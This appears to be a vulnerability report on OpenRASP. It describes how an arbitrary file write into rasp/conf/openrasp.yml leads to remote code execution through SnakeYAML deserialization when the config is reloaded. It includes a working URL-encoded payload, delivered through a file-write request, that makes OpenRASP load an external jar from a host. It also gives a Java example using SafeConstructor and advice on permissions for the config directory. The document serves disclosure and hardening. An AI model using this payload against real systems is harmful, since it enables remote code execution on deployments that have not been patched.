Description (Chinese): Submit your code

snakeyaml does no class filtering. If the application has an arbitrary file write vulnerability, the exploit can be written directly to rasp/conf/openrasp.yml; openrasp reloads the configuration automatically, deserializes the yml, and this leads to RCE.

yml payload

openrasp-testcase can be used directly as the target environment; the following URL makes openrasp load an external jar package:
http://127.0.0.1:8080/vulns/005-file-write.jsp?filename=../../rasp/conf/openrasp.yml&filedata=%27123%27%3A%20%21%21javax.script.ScriptEngineManager%20%5B%21%21java.net.URLClassLoader%20%5B%5B%20%21%21java.net.URL%20%5B%22http%3A//127.0.0.1%3A2334/exp-8.jar%22%5D%5D%5D%5D
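The root cause described above is the choice of SnakeYAML constructor when the config file is parsed. The following added example (not OpenRASP's own code) contrasts the default constructor, which instantiates any class named by a `!!` tag, with `SafeConstructor`, which only builds plain YAML types; it assumes the SnakeYAML 2.x API and uses a constructed config string with a harmless `java.net.URL` tag in place of the jar-loading payload.

```java
import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.ConstructorException;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import java.util.Map;

public class OpenRaspYamlCheck {
    // Constructed sample: an openrasp.yml-style document where one value carries
    // a global tag naming a JDK class (harmless here, but the same mechanism the
    // PR description relies on).
    static final String TAINTED_CONFIG =
        "log.maxburst: 100\n" +
        "'123': !!java.net.URL [\"http://example.invalid/\"]\n";

    // Vulnerable pattern: the default Constructor resolves !!<class> tags and
    // calls a matching constructor of that class while parsing.
    static Map<String, Object> loadUnsafe(String yaml) {
        return new Yaml().load(yaml);
    }

    // Hardened pattern: SafeConstructor knows only the standard YAML types and
    // throws ConstructorException on any tag it cannot map to them.
    static Map<String, Object> loadSafe(String yaml) {
        return new Yaml(new SafeConstructor(new LoaderOptions())).load(yaml);
    }

    public static void main(String[] args) {
        Object v = loadUnsafe(TAINTED_CONFIG).get("123");
        // Prints java.net.URL: the class named in the file was instantiated.
        System.out.println("default constructor built: " + v.getClass().getName());

        try {
            loadSafe(TAINTED_CONFIG);
            System.out.println("unexpected: tainted config accepted");
        } catch (ConstructorException e) {
            // Reload should fail closed and keep the previous configuration.
            System.out.println("SafeConstructor rejected: " + e.getMessage());
        }
    }
}
```

Switching the constructor closes the deserialization step, but the file write that puts attacker-controlled content into rasp/conf remains a separate problem: the agent's config directory should not be writable by the application user.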